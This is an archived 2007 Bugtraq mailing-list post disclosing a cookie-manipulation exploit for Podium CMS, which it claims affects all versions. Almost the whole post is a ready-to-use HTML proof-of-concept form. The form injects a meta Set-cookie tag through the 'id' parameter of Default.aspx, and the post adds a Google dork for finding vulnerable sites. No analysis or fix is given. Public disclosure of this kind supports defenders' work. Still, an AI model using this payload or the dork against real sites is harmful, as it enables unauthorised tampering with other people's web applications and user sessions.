| To: | bugtraq@securityfocus.com |
|---|---|
| Subject: | Podium CMS - Cookie Manipulation Exploit |
| From: | john@martinelli.com |
| Date: | 5 May 2007 17:52:47 -0000 |
| Delivered-to: | sp-com-lists@consult.net |
| Delivered-to: | bugtraq-list@securepoint.com |
| Delivered-to: | mailing list bugtraq@securityfocus.com |
| Delivered-to: | moderator for bugtraq@securityfocus.com |
| List-help: | <mailto:bugtraq-help@securityfocus.com> |
| List-id: | <bugtraq.list-id.securityfocus.com> |
| List-post: | <mailto:bugtraq@securityfocus.com> |
| List-subscribe: | <mailto:bugtraq-subscribe@securityfocus.com> |
| List-unsubscribe: | <mailto:bugtraq-unsubscribe@securityfocus.com> |
| Mailing-list: | contact bugtraq-help@securityfocus.com; run by ezmlm |
<!-- Podium CMS - Cookie Manipulation Exploit Vulnerable: All Versions Google d0rk: inurl:"podium/Default.aspx" John Martinelli john@martinelli.com http://john-martinelli.com May 5th, 2007 !--> <html> <head><title>Podium CMS - Cookie Manipulation Exploit</title><body> <center><br><br><font size=4>Podium CMS - Cookie Manipulation Exploit</font><br><font size=3>discovered by <a href="http://john-martinelli.com";>John Martinelli</a><br><br>Google d0rk: <a href="http://www.google.com/search?hl=en&safe=off&q=inurl%3A%22podium%2FDefault.aspx";>inurl:"podium/Default.aspx"</a></font><br> <br><br> <form action="http://target.com/podium/Default.aspx"; method="post"> <input name="id" size=75 value="<meta+http-equiv='Set-cookie'+content='cookiename=cookievalue'>"> <input type=submit value="Execute Cookie Manipuation" class="button"> </form> </body></html> |
| <Prev in Thread] | Current Thread | [Next in Thread> |
|---|---|---|
| ||
| Previous by Date: | [ GLSA 200705-06 ] X.Org X11 library: Multiple integer overflows, Raphael Marichez |
|---|---|
| Next by Date: | UPDATED: CubeCart (v3.0.15) - CRLF Injection Vulnerability, john |
| Previous by Thread: | [ GLSA 200705-06 ] X.Org X11 library: Multiple integer overflows, Raphael Marichez |
| Next by Thread: | UPDATED: CubeCart (v3.0.15) - CRLF Injection Vulnerability, john |
| Indexes: | [Date] [Thread] [Top] [All Lists] |